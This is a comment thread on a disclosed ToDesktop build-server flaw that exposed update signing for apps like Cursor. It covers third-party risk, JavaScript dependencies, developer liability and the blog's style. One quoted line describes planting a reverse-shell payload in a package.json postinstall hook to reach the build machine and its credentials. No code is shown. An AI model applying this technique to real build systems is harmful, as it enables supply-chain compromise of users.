I had these kind of discussions with naive developers giving _full access_ to GitHub orgs to various 3rd party apps -- that's never right!
Yeah, it is their fault. I don't download "todesktop" (to-exploit), I download Cursor. Don't give 3rd parties push access to all your clients, that's crazy. How can this crappy startup build server sign a build for you? That's insane.
it blows me away that this is even a product. it's like a half day of dev time, and they don’t appear to have over-engineered it or even done basic things given the exploit here.
Software developers don't actually write software anymore, they glue together VC-funded security nightmares every 1-3 years, before moving on to the next thing. This goes on and on until society collapses under its own weight.
In my experience, blame for this basically never lies on grunt-level devs; it's EMs and CTOs/CIOs who insist on using third-party products for everything out of some misguided belief that it will save dev time and it's foolish to reinvent the wheel. (Of course, often figuring out how to integrate a third-party wheel, and maintain the integration, is predictably far more work for a worse result than making your own wheel in the first place, but I have often found it difficult to convince managers of this. In fairness, occasionally they're right and I'm wrong!)
With all due respect, a compile pipeline across Win, Mac, Linux, for different CPU architectures, making sure signing works for all, and that the Electron auto-updater works as expected is a nightmare. I have been there, and it’s not fun.
I somewhat enjoy the fact that every time this blog gets posted, half of the comments are about the cat and lack of capital letters.
> i wanted to get on the machine where the application gets built and the easiest way to do this would be a postinstall script in package.json, so i did that with a simple reverse shell payload
From ToDesktop incident report,
> This leak occurred because the build container had broader permissions than necessary, allowing a postinstall script in an application's package.json to retrieve Firebase credentials. We have since changed our architecture so that this can not happen again, see the "Infrastructure and tooling" and "Access control and authentication" sections above for more information about our fixes.
I'm curious to know what the trial/error here was to get their machine to spit out the build or if it was in one-shot
> please do not harass these companies or make it seem like it's their fault, it's not
It also is, they are responsible for which tech pieces they pick in constructing their own puzzle
Love the blog aesthetic, and the same goes to all your friends (linked at the bottom).
The lack of capitalization made it difficult for me to quickly read sentences. I had to be much more intentful when scanning the text.
With rhe number of dependencies and dependency trees going multiple levels deep? Third party risk is the largely unaddressed elephant in the room that companies don't care about.
I started to use
-paid operating system (rhel) with a team of paid developers and maintainers verifying builds and dependencies.
- empty dependencies. Only what the core language provides.
It's not that great of a sacrifice. Like 20$/mo for the OS. And like 2 days of dev work which pays itself off in the long run by avoiding a mass of code you don't understand
"the build container now has a privileged sidecar that does all of the signing, uploading and everything else instead of the main container with user code having that logic."
Does this info about the fix seem alarming to anyone else? It's not a full description, so maybe some important details are left out? My understanding is that containers are generally not considered a secure enough boundary. Companies such as AWS use micro VMs (Firecracker) for secure multi tenant container workloads.
Oof. I already have enough stress of my own autoupdating, single-file remote access tool I run on all of my computers, given at a small part of the custom OTA mechanics' security is by obscurity. Would make sleeping hard owning something as popular as this.
1. Build a rootkit into your product.
2. Release your product.
I’d like to see some thoughts on where we go from here. Is there a way we can keep end users protected even despite potential compromise of services like ToDesktop?
(eg: companies still hosting some kind of integrity checking service themselves and the download is verified against that… likely there’s smarter ideas)
The user experience of auto-update is great, but having a single fatal link in the chain seems worrying. Can we secure it better?
The first step I'd recommend is to not use Electron when building a native app.
Unfortunately it’s easy to overlook the SPoF. This will happen again and again. Cloudflare, I’m looking at you..
The cat is cute but I'd rather not have it running in front of the text while I'm trying to read and use my cursor.
I had to go back and enable JavaScript. Wow, is the goal to direct my attention away from reading the text?
Ironically, it actually helped me stay focused on the article. Kind of like a fidget toy. When part of my brain would get bored, I could just move the cat and satisfy that part of my brain while I keep reading.
I know that sounds kind of sad that my brain can't focus that well (and it is), but I appreciated the cat.
If one could click the cat to make it dead, that'd work for everyone?
I can't see the cat! I went back and it just isn't working for me. I'm sad, I like cats.
Here it is:
https://en.m.wikipedia.org/wiki/Neko_(software)
Ah, whimsy memories of running that on beige boxen of my youth.
Also remember a similar thing with some Lemmings randomly falling and walking around on windows.
Played way too long having them pile up and yank the window from under them.
Then just… put the cursor in the corner? The blog isn’t interactive or anything. I think the cat is cute.
Cats tend to do that.
There are plenty of other websites that don't do that. Perhaps one of those would work better for you?
As someone who already has trouble reading due to eye issues, the lack of capital letters made this infuriatingly difficult to read.
From the ToDesktop write-up:
Is there an easy way to validate the version of Cursor one is running against the updated version by checking a hash or the like?I guess what I'm surprised at here is that a popular ? IDE would be delivered over a delivery platform like this (immature or not)
I would've expected IDE developers to "roll their own"
tbh if i had one wish i would love to see how five eyes get root level access to every device seems an insane amount of data
So TL;DR the vuln here is that ToDesktop injected production secrets in the container they use to build customer-supplied images.
This is completely incompetent to the point of gross negligence. There is no excuse for this
The javascript world has a culture of lots of small dependencies that end up becoming a huge tree no one could reasonable vendor or audit changes for. Worse these small dependencies churn much faster than for other languages.
With that culture supply chain attacks and this kind of vulnerability will keep happening a lot.
You want few dependencies, you want them to be widely used and you want them to be stable. Pulling in a tree of modules to check if something is odd or even isn't a good idea.
> security incidents happen all the time
Do they have to?
Isn't this notion making developers sloppy?
Yes.
As usual, I read the comments here first. I'm glad I read the article though because the comments here have pretty much nothing to do with the vulnerability. Here's a summary because the article actually jumps over explaining the vulnerability in the gap between two paragraphs:
This service is a kind of "app store" for JS applications installed on desktop machines. Their service hosts download assets, with a small installer/updater application running on the users' desktop that pulls from the download assets.
The vulnerability worked like this: the way application publishers interact with the service is to hand it a typical JS application source code repo, which the service builds, in a container in typical CI fashion. Therefore the app publisher has complete control over the build environment.
Meanwhile, the service performs security-critical operations inside that same container, using credentials from the container image. Furthermore, the key material used to perform these operations is valid for all applications, not just the one being built.
These two properties of the system: 1. build system trusts the application publisher (typical, not too surprising) and 2. build environment holds secrets that allow compromise of the entire system (not typical, very surprising), over all publishers not just the current one, allow a malicious app publisher to subvert other publishers' applications.
My goodness. So much third-party risk upon risk and lots of external services opening up this massive attack surface and introducing this RCE vulnerability.
From an Electron bundler service, to sourcemap extraction and now an exposed package.json with the container keys to deploy any app update to anyone's machine.
This isn't the only one, the other day Claude CLI got a full source code leak via the same method from its sourcemaps being exposed.
But once again, I now know why the entire Javascript / TypeScript ecosystem is beyond saving given you can pull the source code out of the sourcemap and the full credentials out of a deployed package.json.
The issue here is not sourcemaps being available. The issue is admin credentials being shipped to clients for no reason.
Blaming Js/Ts is ridiculous. All those same problems exist in all environments. Js/Ts is the biggest so it gets the most attention but if you think it's different in any other environment you're fooling yourself.
Ecosystem, not the lang itself.
It truly is a community issue, it's not a matter of the lang.
You will never live down fucking left-pad
[flagged]
> But once again, I now know why the entire Javascript / TypeScript ecosystem is beyond saving given you can pull the source code out of the sourcemap and the full credentials out of a deployed package.json.
You've always been able to do the first thing though: the only thing you can do is obfuscate the source map, but it's not like that's a substantial slowdown when you're hunting for authentication points (identify API URLs, work backwards).
And things like credentials in package.json is just a sickness which is global to computing right now: we have so many ways you can deploy credentials, basically 0 common APIs which aren't globals (files or API keys) and even fewer security tools which acknowledge the real danger (protecting me from my computers system files is far less valuable then protecting me from code pretending to be me as my own user - where all the real valuable data already is).
Basically I'm not convinced our security model has ever truly evolved beyond the 1970s where the danger was "you damage the expensive computer" rather then "the data on the computer is worth orders of magnitude more then the computer".
This website loads extremely fast wow
Serving HTML is actually really fast if you don't bolt 17 layers of JavaScript on top of it first.
I'm shocked at how insecure most software is these days. Probably 90% of software built by startups has a critical vulnerability. It seems to keep getting worse year on year. Before, you used to have to have deep systems knowledge to trigger buffer overflows. It was more difficult to find exploits. Nowadays, you just need basic understanding of some common tools, protocols and languages like Firebase, GraphQL, HTTP, JavaScript. Modern software is needlessly complicated and this opens up a lot of opportunities.
> [please don't] make it seem like it's their fault, it's not. it's todesktop's fault if anything
What?! It's not some kind of joke. This could _already_ literally kill people, stole money and ruin lives.
It isn't even an option to avoid taking reaponsibility for the decisions which lead to security and safety of users for any app owner/author.
It's as simple as this: no safety record to 3rd party - no trust, for sure. No security audit - no trust. No transparency in the audit - no trust.
Failing to make the right decision does not exempt from the liability, and should not.
Is it a kindergarden with "it's not me, it's them" play? It does not matter who failed, the money could has been be stolen already from the random ones (who just installed an app wrapped with this todesktop installer), and journalists could have been tracked and probably already killed in some dictatorship or conflict.
Bad decisions does not always make the bad owner.
But don't take it lightly, and don't advocate (for those who just paid you some money) "oh, they are innocent". As they are not. Be a grown-up, please, and let's make this world better together.
Bit breathless. How could this kill people?
The problem is that this entire sclerotic industry is so allergic to accountability, that, if you want people to start, you probably have to fire 90% of the workforce. If it were up to me, the developers responsible for this would never write software "professionally" again.
The industry (or a couple of generations currently inhabiting it) could start with at least accepting responsibility when something goes wrong. Let me be clear: it's not about ending the "blameless culture" in engineering. No. It's about ending the culture of not taking any responsibility at all, when things go south. See the difference.
"range of hundreds of millions of people in tech environments, other hackers, programmers, executives, etc. making this exploit deadly if used."
Bit too hyperbolic or whatever... Otherwise thrilling read!
[flagged]
Automatic update without some manual step by a user means that the devs have RCE on your machine.
I made Signal fix this, but most apps consider it working as intended. We learned nothing from Solarwinds.
> security incidents happen all the time, its natural. what matters is the company's response, and todesktop's response has been awesome, they were very nice to work with.
This was an excellent conclusion for the article.
[dead]
[flagged]
Why does it use Neko the cursor chasing cat? Why the goth color scheme? These are stylistic choices, there is no explaining them.
Thankfully there is reader mode. That dumb cat is so obnoxious on mobile.
woah, the cat chases your taps on mobile!
it’s a blog. people regularly use their personal sites to write in a tone and format that they are fond of. i only normally feel like i see this style from people who were on the internet in the 90s. i’d imagine we would see it even more if phones and auto correct didn’t enforce a specific style. imagine being a slave to the shift key. it can’t even fight back! i’m more upset the urls aren’t actually clickable links.
Finding an RCE for every computer running cursor is cool, and typing in all lowercase isn’t that cool. Finding an RCE on millions of computers has much much higher thermal mass than typing quirks, so the blog post makes typing in all lowercase cool.
why do the stars shine? why does rain fall from the sky? using upper case is just a social convention - throw off your chains.
the cat chase cursor thing is great
its cool. not everything has to be typed in a "normal" way.
just the style of their blog
ToDesktop vulnerability: not surprised. Trust broken.
Question/idea: can't GitHub use LLMs to periodically scan the code for vulnerabilities like this and inform the repo owner?
They can even charge for it ;)
You mean like this, but worse?
https://docs.github.com/en/code-security/code-scanning/intro...
Problem: a tool built with LLMs for building LLMs with LLMs has a vuln
Solution: more LLMs
Snap out of it
So you're saying one more LLM?
[flagged]
I can't post things like "what a bunch of clowns" due to hacker news guidelines so let me go by another more productive route.
These people, the ones who install dependencies (that install dependencies)+, these people who write apps with AI, who in the previous season looped between executing their code and searching the error on stackoverflow.
Whether they work for a company or have their own startup, the moment that they start charging money, they need to be held liable when shit happens.
When they make their business model or employability advantage to take free code in the internet, add pumpkin spice and charge cash for it, they cross the line from pissing passionate hackers by defiling our craft, to dumping in the pool and ruining it for users and us.
It is not sufficient to write somewhere in a contract that something is as is and we hold harmless and this and that. Buddy if you download an ai tool to write an ai tool to write an ai tool and you decided to slap a password in there, you are playing with big guns, if it gets leaked, you are putting other services at risk, but let's call that a misdemeanor. Because we need to reserve something stronger for when your program fails silently, and someone paid you for it, and they relied on your program, and acted on it.
That's worse than a vulnerability, there is no shared responsibility, at least with a vuln, you can argue that it wasn't all your fault, someone else actively caused harm. Now are we to believe the greater risk of installing 19k dependencies and programming ai with ai is vulns? No! We have a certainty, not a risk, that they will fuck it up.
Eventually we should license the field, but for now, we gotta hold devs liable.
Give those of us who do 10 times less, but do it right, some kind of marketing advantages, it shouldn't be legal that they are competing with us. A vscode fork got how much in VC funding?
My brothers lets take arms and defend. And defend quality software I say. Fear not writing code, fear not writing raw html, fear not, for they don't feel fear so why should you?
https://civboot.org
Join me my brother or sister
[flagged]